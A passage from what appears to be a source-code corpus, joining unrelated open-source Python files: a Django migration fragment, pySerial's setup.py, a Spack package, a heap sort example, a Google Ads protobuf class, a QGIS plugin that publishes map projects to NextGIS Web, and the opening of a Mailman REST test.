'Meta': {'object_name': 'ConceptNode'},
'child_typename': ('django.db.models.fields.CharField', [], {'default': "'unnamed'", 'max_length': '50'}),
'ci_tree_info': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['nodemanager.CITreeInfo']"}),
'content': ('django.db.models.fields.TextField', [], {'max_length': '140'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'max_children': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'node_type': ('django.db.models.fields.CharField', [], {'default': "'F'", 'max_length': '1'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'related_name': "'children'", 'null': 'True', 'to': u"orm['nodemanager.ConceptNode']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'user': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['authtools.User']", 'symmetrical': 'False'})
}
}
complete_apps = ['nodemanager'] | kevincwebb/conceptum | conceptum/nodemanager/migrations/0006_auto__add_field_conceptnode_max_children__add_field_conceptnode_child_.py | Python | bsd-3-clause | 8,168 |
# setup.py for pySerial
#
# Windows installer:
# "python setup.py bdist_wininst"
#
# Direct install (all systems):
# "python setup.py install"
#
# For Python 3.x use the corresponding Python executable,
# e.g. "python3 setup.py ..."
#
# (C) 2001-2015 Chris Liechti <[email protected]>
#
# SPDX-License-Identifier: BSD-3-Clause
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# importing version does not work with Python 3 as files have not yet been
# converted.
import serial
version = serial.VERSION
setup(
name = "pyserial",
description = "Python Serial Port Extension",
version = version,
author = "Chris Liechti",
author_email = "[email protected]",
url = "https://github.com/pyserial/pyserial",
packages = ['serial', 'serial.tools', 'serial.urlhandler'],
license = "Python",
long_description = "Python Serial Port Extension for Win32, Linux, BSD, Jython, IronPython",
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Communications',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Terminals :: Serial',
],
platforms = 'any',
scripts = ['serial/tools/miniterm.py'],
)
| hoihu/pyserial | setup.py | Python | bsd-3-clause | 1,969 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyFlake8Polyfill(PythonPackage):
"""flake8-polyfill is a package that provides some compatibility helpers
for Flake8 plugins that intend to support Flake8 2.x and 3.x
simultaneously.
"""
homepage = "https://gitlab.com/pycqa/flake8-polyfill"
pypi = "flake8-polyfill/flake8-polyfill-1.0.2.tar.gz"
version('1.0.2', sha256='e44b087597f6da52ec6393a709e7108b2905317d0c0b744cdca6208e670d8eda')
depends_on('py-setuptools', type='build')
depends_on('py-flake8', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/py-flake8-polyfill/package.py | Python | lgpl-2.1 | 746 |
# Python program for implementation of heap Sort
# To heapify subtree rooted at index i.
# n is size of heap
def heapify(arr, n, i):
largest = i # Initialize largest as root
l = 2 * i + 1 # left = 2*i + 1
r = 2 * i + 2 # right = 2*i + 2
# See if left child of root exists and is
# greater than root
if l < n and arr[i] < arr[l]:
largest = l
# See if right child of root exists and is
# greater than root
if r < n and arr[largest] < arr[r]:
largest = r
# Change root, if needed
if largest != i:
arr[i],arr[largest] = arr[largest],arr[i] # swap
# Heapify the root.
heapify(arr, n, largest)
# The main function to sort an array of given size
def heapSort(arr):
n = len(arr)
# Build a maxheap.
for i in range(n, -1, -1):
heapify(arr, n, i)
# One by one extract elements
for i in range(n-1, 0, -1):
arr[i], arr[0] = arr[0], arr[i] # swap
heapify(arr, i, 0)
# Driver code to test above
arr = [ 12, 11, 13, 5, 6, 7]
heapSort(arr)
n = len(arr)
print ("Sorted array is")
for i in range(n):
print ("%d" %arr[i]),
| salman-bhai/DS-Algo-Handbook | Algorithms/Sort_Algorithms/Heap_Sort/HeapSort.py | Python | mit | 1,165 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v10.resources",
marshal="google.ads.googleads.v10",
manifest={"KeywordThemeConstant",},
)
class KeywordThemeConstant(proto.Message):
r"""A Smart Campaign keyword theme constant.
Attributes:
resource_name (str):
Output only. The resource name of the keyword theme
constant. Keyword theme constant resource names have the
form:
``keywordThemeConstants/{keyword_theme_id}~{sub_keyword_theme_id}``
country_code (str):
Output only. The ISO-3166 Alpha-2 country
code of the constant, eg. "US". To display and
query matching purpose, the keyword theme needs
to be localized.
This field is a member of `oneof`_ ``_country_code``.
language_code (str):
Output only. The ISO-639-1 language code with
2 letters of the constant, eg. "en". To display
and query matching purpose, the keyword theme
needs to be localized.
This field is a member of `oneof`_ ``_language_code``.
display_name (str):
Output only. The display name of the keyword
theme or sub keyword theme.
This field is a member of `oneof`_ ``_display_name``.
"""
resource_name = proto.Field(proto.STRING, number=1,)
country_code = proto.Field(proto.STRING, number=2, optional=True,)
language_code = proto.Field(proto.STRING, number=3, optional=True,)
display_name = proto.Field(proto.STRING, number=4, optional=True,)
__all__ = tuple(sorted(__protobuf__.manifest))
| googleads/google-ads-python | google/ads/googleads/v10/resources/types/keyword_theme_constant.py | Python | apache-2.0 | 2,290 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
publishdialog.py
---------------------
Date : September 2014
Copyright : (C) 2014 by NextGIS
Email : info at nextgis dot org
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'NextGIS'
__date__ = 'September 2014'
__copyright__ = '(C) 2014, NextGIS'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import time
import sys
import re
import json
import datetime
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtXml import *
from qgis.core import *
from qgis.gui import *
import requests
import os
import glob
import uuid
import tempfile
import zipfile
from newngwconnectiondialog import NewNGWConnectionDialog
from ui_publishdialogbase import Ui_Dialog
class PublishDialog(QDialog, Ui_Dialog):
def __init__(self, iface):
QDialog.__init__(self)
self.setupUi(self)
self.iface = iface
self.btnOk = self.buttonBox.button(QDialogButtonBox.Ok)
self.btnClose = self.buttonBox.button(QDialogButtonBox.Close)
self.btnNew.clicked.connect(self.newConnection)
self.btnEdit.clicked.connect(self.editConnection)
self.btnDelete.clicked.connect(self.deleteConnection)
self.btnBrowse.clicked.connect(self.selectProject)
self.populateConnectionList()
def newConnection(self):
dlg = NewNGWConnectionDialog(self)
if dlg.exec_():
self.populateConnectionList()
del dlg
def editConnection(self):
dlg = NewNGWConnectionDialog(self, self.cmbConnections.currentText())
if dlg.exec_():
self.populateConnectionList()
del dlg
def deleteConnection(self):
key = '/connections/' + self.cmbConnections.currentText()
settings = QSettings('NextGIS', 'publish2ngw')
settings.remove(key)
self.populateConnectionList()
def populateConnectionList(self):
self.cmbConnections.clear()
settings = QSettings('NextGIS', 'publish2ngw')
settings.beginGroup('/connections')
self.cmbConnections.addItems(settings.childGroups())
settings.endGroup()
lastConnection = settings.value('/ui/lastConnection', '')
idx = self.cmbConnections.findText(lastConnection)
if idx == -1 and self.cmbConnections.count() > 0:
self.cmbConnections.setCurrentIndex(0)
else:
self.cmbConnections.setCurrentIndex(idx)
if self.cmbConnections.count() == 0:
self.btnEdit.setEnabled(False)
self.btnDelete.setEnabled(False)
else:
self.btnEdit.setEnabled(True)
self.btnDelete.setEnabled(True)
def selectProject(self):
settings = QSettings('NextGIS', 'publish2ngw')
lastDirectory = settings.value('lastDirectory', '.')
fileName = QFileDialog.getOpenFileName(self, self.tr('Select project'), lastDirectory, self.tr('QGIS files (*.qgs *.QGS)'))
if fileName == '':
return
self.leProject.setText(fileName)
settings.setValue('lastDirectory', QFileInfo(fileName).absoluteDir().absolutePath())
def reject(self):
settings = QSettings('NextGIS', 'publish2ngw')
settings.setValue('/ui/lastConnection', self.cmbConnections.currentText())
QDialog.reject(self)
def accept(self):
projectFile = QFile(self.leProject.text())
if not projectFile.open(QIODevice.ReadOnly | QIODevice.Text):
return
doc = QDomDocument()
success, error, lineNum, columnNum = doc.setContent(projectFile, True)
if not success:
return
projectFile.close()
settings = QSettings('NextGIS', 'publish2ngw')
key = '/connections/' + self.cmbConnections.currentText()
self.url = settings.value(key + '/url', '')
self.user = settings.value(key + '/user', '')
self.password = settings.value(key + '/password', '')
self.btnOk.setEnabled(False)
self.btnClose.setEnabled(False)
QApplication.processEvents()
layers = dict()
if doc is not None:
layerNodes = doc.elementsByTagName('maplayer')
for i in xrange(layerNodes.size()):
element = layerNodes.at(i).toElement()
layers[element.firstChildElement('id').text()] = element
self.progressBar.setRange(0, len(layers))
self.progressBar.setValue(0)
self.progressBar.setFormat('%v/%m')
projectTitle = ''
root = doc.documentElement()
e = root.firstChildElement('title')
projectTitle = e.text()
if projectTitle == '':
projectTitle = QFileInfo(self.leProject.text()).baseName()
QgsMessageLog.logMessage('Creating group', 'Publish2NGW', QgsMessageLog.INFO)
QApplication.processEvents()
finished = False
while not finished:
try:
url = self.url + '/resource/0/child/'
params = dict(resource=dict(cls='resource_group', display_name=projectTitle))
group = requests.post(url, auth=(self.user, self.password), data=json.dumps(params))
finished = True
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
ret = QMessageBox.question(self, self.tr('Retry'), self.tr('Unable to publish. Retry in 30 sec?'), QMessageBox.Retry | QMessageBox.Cancel, QMessageBox.Cancel)
if ret == QMessageBox.Retry:
time.sleep(30)
continue
else:
QgsMessageLog.logMessage('Canceled by user', 'Publish2NGW', QgsMessageLog.INFO)
self.canceled()
return
except requests.exceptions.RequestException, e:
group = None
QgsMessageLog.logMessage('Unable to create resource group %s: %s' % (projectTitle, e.message), 'Publish2NGW', QgsMessageLog.INFO)
self.canceled()
return
if group:
groupId = group.json()['id']
projectTree = self.layerTree(doc)
for layerId, layerElement in layers.iteritems():
layer = None
dataSource = layerElement.firstChildElement('datasource')
uri = dataSource.text()
if uri.startswith('dbname'):
dsUri = QgsDataSourceURI(uri)
if dsUri.host() == '':
dbPath = dsUri.database()
absolutePath = self.fullLayerPath(dbPath, self.leProject.text())
if dbPath != absolutePath:
dsUri.setDatabase(absolutePath)
node = doc.createTextNode(dsUri.uri())
dataSource.replaceChild(node, dataSource.firstChild())
else:
absolutePath = self.fullLayerPath(uri, self.leProject.text())
if absolutePath != uri:
node = doc.createTextNode(absolutePath)
dataSource.replaceChild(node, dataSource.firstChild())
layerType = layerElement.attribute('type')
if layerType == 'vector':
layer = QgsVectorLayer()
elif layerType == 'raster':
layer = QgsRasterLayer()
if layer:
layer.readLayerXML(layerElement)
layer.setLayerName(layerElement.firstChildElement('layername').text())
if layer is None:
continue
self.progressBar.setValue(self.progressBar.value() + 1)
QgsMessageLog.logMessage('Publishing %s' % layer.name(), 'Publish2NGW', QgsMessageLog.INFO)
QApplication.processEvents()
if not absolutePath.startswith('dbname'):
if not os.path.exists(absolutePath):
time.sleep(10)
QgsMessageLog.logMessage('Layer not found', 'Publish2NGW', QgsMessageLog.INFO)
continue
finished = False
while not finished:
try:
resLayer = self.addLayer(groupId, layer.name(), layer)
finished = True
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
ret = QMessageBox.question(self, self.tr('Retry'), self.tr('Unable to publish. Retry in 30 sec?'), QMessageBox.Retry | QMessageBox.Cancel, QMessageBox.Cancel)
if ret == QMessageBox.Retry:
time.sleep(30)
continue
else:
QgsMessageLog.logMessage('Canceled by user', 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + groupId
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
if resLayer is None:
QgsMessageLog.logMessage('Layer upload failed. Exiting', 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + str(groupId)
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
if resLayer.status_code / 100 != 2:
msg = json.dumps(resLayer.json()['message'], ensure_ascii=False).strip('"')
QgsMessageLog.logMessage('NGW error: %s' % msg, 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + str(groupId)
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
QgsMessageLog.logMessage('Publishing style for %s' % layer.name(), 'Publish2NGW', QgsMessageLog.INFO)
QApplication.processEvents()
finished = False
while not finished:
try:
resStyle = self.addStyle(resLayer, layer).json()
finished = True
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
ret = QMessageBox.question(self, self.tr('Retry'), self.tr('Unable to publish. Retry in 30 sec?'), QMessageBox.Retry | QMessageBox.Cancel, QMessageBox.Cancel)
if ret == QMessageBox.Retry:
time.sleep(30)
continue
else:
QgsMessageLog.logMessage('Canceled by user', 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + groupId
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
if not isinstance(resStyle, dict) and resStyle.status_code / 100 != 2:
msg = json.dumps(resStyle.json()['message'], ensure_ascii=False).strip('"')
QgsMessageLog.logMessage('NGW error: %s' % msg, 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + str(groupId)
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
self.updateLayerData(projectTree, layerId, resStyle['id'])
mapTitle = projectTitle + '-map'
authIdElem = doc.documentElement().firstChildElement('mapcanvas').firstChildElement('destinationsrs').firstChildElement('spatialrefsys').firstChildElement('authid')
if not authIdElem.isNull():
crs = QgsCRSCache.instance().crsByAuthId(authIdElem.text())
else:
crs = QgsCRSCache.instance().crsByEpsgId(4326)
extent = QgsRectangle()
root = doc.documentElement()
canvas = root.firstChildElement('mapcanvas')
e = canvas.firstChildElement('extent')
xMin = float(e.firstChildElement('xmin').text())
xMax = float(e.firstChildElement('xmax').text())
yMin = float(e.firstChildElement('ymin').text())
yMax = float(e.firstChildElement('ymax').text())
extent.set(xMin, yMin, xMax, yMax)
crsTransform = QgsCoordinateTransform(crs, QgsCoordinateReferenceSystem(4326))
outExtent = crsTransform.transformBoundingBox(extent)
QgsMessageLog.logMessage('Creating map', 'Publish2NGW', QgsMessageLog.INFO)
QApplication.processEvents()
finished = False
while not finished:
try:
mapTree = self.paramsFromLayerTree(projectTree)
if mapTree is None:
QgsMessageLog.logMessage('Unable to create web-map: there are no styles.', 'Publish2NGW', QgsMessageLog.INFO)
self.canceled()
return
url = self.url + '/resource/' + str(groupId) + '/child/'
params = dict(resource=dict(cls='webmap', display_name=mapTitle, parent=dict(id=groupId)), webmap=dict(extent_left=outExtent.xMinimum(), extent_right=outExtent.xMaximum(), extent_top=outExtent.yMaximum(), extent_bottom=outExtent.yMinimum(), root_item=dict(item_type='root', children=mapTree)))
m = requests.post(url, auth=(self.user, self.password), data=json.dumps(params))
finished = True
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
ret = QMessageBox.question(self, self.tr('Retry'), self.tr('Unable to publish. Retry in 30 sec?'), QMessageBox.Retry | QMessageBox.Cancel, QMessageBox.Cancel)
if ret == QMessageBox.Retry:
time.sleep(30)
continue
else:
QgsMessageLog.logMessage('Canceled by user', 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + groupId
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
except requests.exceptions.RequestException, e:
QgsMessageLog.logMessage(e.message, 'Publish2NGW', QgsMessageLog.INFO)
ret = QMessageBox.question(self, self.tr('Cleanup'), self.tr('Publishing error. Drop resource group?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
url = self.url + '/resource/0/child/' + groupId
requests.delete(url, auth=(self.user, self.password))
self.canceled()
return
self.published(m)
def published(self, wmap):
ret = QMessageBox.question(self, self.tr('Finished'), self.tr('Publishing completed.\n\nOpen map?'), QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if ret == QMessageBox.Yes:
QDesktopServices.openUrl(QUrl(self.url + '/resource/' + str(wmap.json()['id']) + '/display'))
self.btnOk.setEnabled(True)
self.btnClose.setEnabled(True)
self.progressBar.setRange(0, 1)
self.progressBar.setValue(0)
self.progressBar.setFormat('')
def canceled(self):
QMessageBox.warning(self, self.tr('Finished'), self.tr('Publishing failed. See log for more details'))
self.btnOk.setEnabled(True)
self.btnClose.setEnabled(True)
self.progressBar.setRange(0, 1)
self.progressBar.setValue(0)
self.progressBar.setFormat('')
def addLayer(self, parent, name, layer):
layerName = layer.name()
layerType = layer.type()
provider = layer.providerType()
auth = (self.user, self.password)
try:
if layerType == QgsMapLayer.VectorLayer:
if provider == 'ogr':
source = self.exportToShapeFile(layer)
filePath = self.compressShapeFile(source)
with open(filePath, 'rb') as f:
fl = requests.put(self.url + '/file_upload/upload', auth=auth, data=f)
url = self.url + '/resource/' + str(parent) + '/child/'
params = dict(resource=dict(cls='vector_layer', display_name=name), vector_layer=dict(srs=dict(id=3857), source=fl.json()))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
elif provider == 'postgres':
metadata = layer.source().split(' ')
regex = re.compile('^host=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
host = tmp[pos + 1:]
regex = re.compile('^dbname=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
dbname = tmp[pos + 2:-1]
regex = re.compile('^user=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
userName = tmp[pos + 2:-1]
regex = re.compile('^password=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
password = tmp[pos + 2:-1]
regex = re.compile('^key=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
key = tmp[pos + 2:-1]
regex = re.compile('^table=.*')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
tmp = metadata[pos]
pos = tmp.find('=')
tmp = tmp[pos + 2:-1].split('.')
schema = tmp[0][:-1]
table = tmp[1][1:]
regex = re.compile('^\(.*\)')
pos = metadata.index([m.group(0) for l in metadata for m in [regex.search(l)] if m][0])
column = metadata[pos][1:-1]
url = self.url + '/resource/' +str(parent) +'/child/'
connName = host + '-' + dbname + '-' + datetime.datetime.now().isoformat()
params = dict(resource=dict(cls='postgis_connection', display_name=connName), postgis_connection=dict(hostname=host, database=dbname, username=userName, password=password))
c = requests.post(url, auth=auth, data=json.dumps(params))
params = dict(resource=dict(cls='postgis_layer', display_name=name), postgis_layer=dict(srs=dict(id=3857), fields='update', connection=c.json(), table=table, schema=schema, column_id=key, column_geom=column))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
else:
QgsMessageLog.logMessage('Unable to publish layer %s: unsupported data provider: %s.' % (layerName, provider), 'PublishToNGW', QgsMessageLog.INFO)
return None
elif layerType == QgsMapLayer.RasterLayer:
if provider == 'gdal':
filePath = layer.source()
with open(filePath, 'rb') as f:
fl = requests.put(self.url + '/file_upload/upload', auth=auth, data=f)
url = self.url + '/resource/' + str(parent) + '/child/'
params = dict(resource=dict(cls='raster_layer', display_name=name), raster_layer=dict(srs=dict(id=3857), source=fl.json()))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
elif provider == 'wms':
metadata = layer.source()
regex = re.compile('format=.*?&')
m = regex.search(metadata)
tmp = metadata[m.start():m.end() - 1]
pos = tmp.find('=')
imgFormat = tmp[pos + 1:]
regex = re.compile('layers=.*?&')
m = regex.findall(metadata)
tmp = []
for i in m:
pos = i.find('=')
tmp.append(i[pos+1:-1])
layers = ','.join(tmp)
regex = re.compile('url=.*')
m = regex.search(metadata)
tmp = metadata[m.start():m.end()]
pos = tmp.find('=')
uri = tmp[pos + 1:]
regex = re.compile('//.*/')
m = regex.search(uri)
host = uri[m.start():m.end()][2:-1]
url = self.url + '/resource/' + str(parent) + '/child/'
connName = host + '-' + datetime.datetime.now().isoformat()
params = dict(resource=dict(cls='wmsclient_connection', display_name=connName), wmsclient_connection=dict(url=uri, version='1.1.1', capcache='query'))
c = requests.post(url, auth=auth, data=json.dumps(params))
params = dict(resource=dict(cls='wmsclient_layer', display_name=name), wmsclient_layer=dict(srs=dict(id=3857), wmslayers=layers, imgformat=imgFormat, connection=c.json()))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
else:
QgsMessageLog.logMessage('Unable to publish layer %s: unsupported data provider: %s.' % (layerName, provider), 'Publish2NGW', QgsMessageLog.INFO)
return None
else:
QgsMessageLog.logMessage('Unable to publish layer %s: unsupported layer type %s' % (layerName, layerType), 'Publish2NGW', QgsMessageLog.INFO)
return None
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
if hasattr(e, 'message'):
QgsMessageLog.logMessage(str(e.message), 'Publish2NGW', QgsMessageLog.INFO)
else:
QgsMessageLog.logMessage(unicode(e), 'Publish2NGW', QgsMessageLog.INFO)
raise
except requests.exceptions.RequestException, e:
QgsMessageLog.logMessage('Unable to publish layer %s: %s' % (layerName, e.message), 'Publish2NGW', QgsMessageLog.INFO)
return None
def addStyle(self, resource, layer):
layerId = resource.json()['id']
layerName = layer.name()
layerType = layer.type()
provider = layer.providerType()
auth = (self.user, self.password)
styleName = layerName + '-style'
try:
if layerType == QgsMapLayer.VectorLayer:
tmp = self.tempFileName('.qml')
msg, saved = layer.saveNamedStyle(tmp)
with open(tmp, 'rb') as f:
styleFile = requests.put(self.url + '/file_upload/upload', auth=auth, data=f)
url = self.url + '/mapserver/qml-transform'
params = dict(file=dict(upload_meta=[styleFile.json()]))
hdrAccept = {'Accept': 'application/json'}
ngwStyle = requests.post(url, auth=auth, headers=hdrAccept, data=json.dumps(params))
url = self.url + '/resource/' + str(layerId) +'/child/'
params = dict(resource=dict(cls='mapserver_style', display_name=styleName, parent=dict(id=layerId)), mapserver_style=dict(xml=ngwStyle.json()))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
elif layerType == QgsMapLayer.RasterLayer:
if provider == 'gdal':
url = self.url + '/resource/' + str(layerId) +'/child/'
params = dict(resource=dict(cls='raster_style', display_name=styleName, parent=dict(id=layerId)))
res = requests.post(url, auth=auth, data=json.dumps(params))
return res
elif provider == 'wms':
return resource
else:
QgsMessageLog.logMessage('Unable to publish style for layer %s: unsupported data provider: %s.' % (layerName, provider), 'Publish2NGW', QgsMessageLog.INFO)
return None
else:
QgsMessageLog.logMessage('Unable to publish style for layer %s: unsupported layer type %s' % (layerName, layerType), 'Publish2NGW', QgsMessageLog.INFO)
return None
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout), e:
if hasattr(e, 'message'):
QgsMessageLog.logMessage(unicode(e.message), 'Publish2NGW', QgsMessageLog.INFO)
else:
QgsMessageLog.logMessage(unicode(e), 'PublishToNGW', QgsMessageLog.INFO)
raise
except requests.exceptions.RequestException, e:
QgsMessageLog.logMessage('Unable to publish layer %s: %s' % (layerName, e.message), 'Publish2NGW', QgsMessageLog.INFO)
return None
def updateLayerData(self, data, layerId, styleId):
for item in data:
if item['itemType'] == 'layer' and item['id'] == layerId:
item['styleId'] = styleId
elif item['itemType'] == 'group':
item['layers'] = self.updateLayerData(item['layers'], layerId, styleId)
return data
def layerTree(self, doc):
tree = []
legend = doc.documentElement().firstChildElement('legend')
child = legend.firstChildElement()
while not child.isNull():
e = child.toElement()
itemType = e.tagName()
if itemType == 'legendlayer':
layer = dict()
layer['itemType'] = 'layer'
fileNodes = e.elementsByTagName('legendlayerfile')
lid = fileNodes.at(0).toElement().attribute('layerid')
layer['id'] = lid
layer['name'] = e.attribute('name')
layer['enabled'] = 'true' if e.attribute('checked') == 'Qt::Checked' else 'false'
tree.append(layer)
elif itemType == 'legendgroup':
group = dict()
group['itemType'] = 'group'
group['name'] = e.attribute('name')
group['open'] = e.attribute('open')
group['layers'] = []
legendLayer = e.firstChildElement()
while not legendLayer.isNull():
layer = dict()
layer['itemType'] = 'layer'
fileNodes = legendLayer.elementsByTagName('legendlayerfile')
lid = fileNodes.at(0).toElement().attribute('layerid')
layer['id'] = lid
layer['name'] = legendLayer.attribute('name')
layer['enabled'] = 'true' if legendLayer.attribute('checked') == 'Qt::Checked' else 'false'
group['layers'].append(layer)
legendLayer = legendLayer.nextSiblingElement()
tree.append(group)
child = child.nextSiblingElement()
return tree
def fullLayerPath(self, source, filePath):
if not source.startswith(('./', '../')):
return source
src = source
prj = filePath
if sys.platform == 'win32':
src = src.replace('\\', '/')
prj = prj.replace('\\', '/')
uncPath = prj.startswith('//')
layerParts = [s for s in src.split('/') if s]
projectParts = [s for s in prj.split('/') if s]
if sys.platform == 'win32' and uncPath:
projectParts.insert(0, '')
projectParts.insert(0, '')
projectParts = projectParts[:-1]
projectParts.extend(layerParts)
projectParts = [elem for elem in projectParts if elem != '.']
while '..' in projectParts:
i = projectParts.index('..')
projectParts.pop(i - 1)
projectParts.pop(i - 1)
if sys.platform != 'win32':
projectParts.insert(0, '')
return '/'.join(projectParts)
def tempFileName(self, suffix):
fName = os.path.join(
tempfile.gettempdir(), unicode(uuid.uuid4()).replace('-', '') + suffix)
return fName
def exportToShapeFile(self, layer):
tmp = self.tempFileName('.shp')
QgsVectorFileWriter.writeAsVectorFormat(layer, tmp, 'utf-8', layer.crs())
return tmp
def compressShapeFile(self, filePath):
tmp = self.tempFileName('.zip')
basePath = os.path.splitext(filePath)[0]
baseName = os.path.splitext(os.path.basename(filePath))[0]
zf = zipfile.ZipFile(tmp, 'w', zipfile.ZIP_DEFLATED)
for i in glob.iglob(basePath + '.*'):
ext = os.path.splitext(i)[1]
zf.write(i, baseName + ext)
zf.close()
return tmp
def paramsFromLayerTree(self, tree):
params = []
for item in tree:
if item['itemType'] == 'layer':
if 'styleId' not in item:
return params
layer = dict(item_type='layer', display_name=item['name'], layer_style_id=item['styleId'], layer_enabled=item['enabled'], layer_adapter='image', children=[])
params.append(layer)
elif item['itemType'] == 'group':
group = dict(item_type='group', display_name=item['name'], group_expanded=item['open'], children=self.paramsFromLayerTree(item['layers']))
params.append(group)
return params
| nextgis/publish2ngw | publishdialog.py | Python | gpl-2.0 | 32,789 |
# Copyright (C) 2015 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""Test the `queues` resource."""
__all__ = [
'TestQueues',
]
import unittest
from mailman.app.lifecycle import create_list
from mailman.config import config
from mailman.database.transaction import transaction
from mailman.testing.helpers import call_api, get_queue_messages
from mailman.testing.layers import RESTLayer
from urllib.error import HTTPError
TEXT = """\
From: [email protected]
To: [email protected]
Subject: A test
Message-ID: <ant>
"""
class TestQueues(unittest.TestCase):
layer = RESTLayer
def setUp(self):
with transaction():
self._mlist = create_list('[email protected]')
def test_missing_queue(self):
# Trying to print a missing queue gives a 404.
with self.assertRaises(HTTPError) as cm:
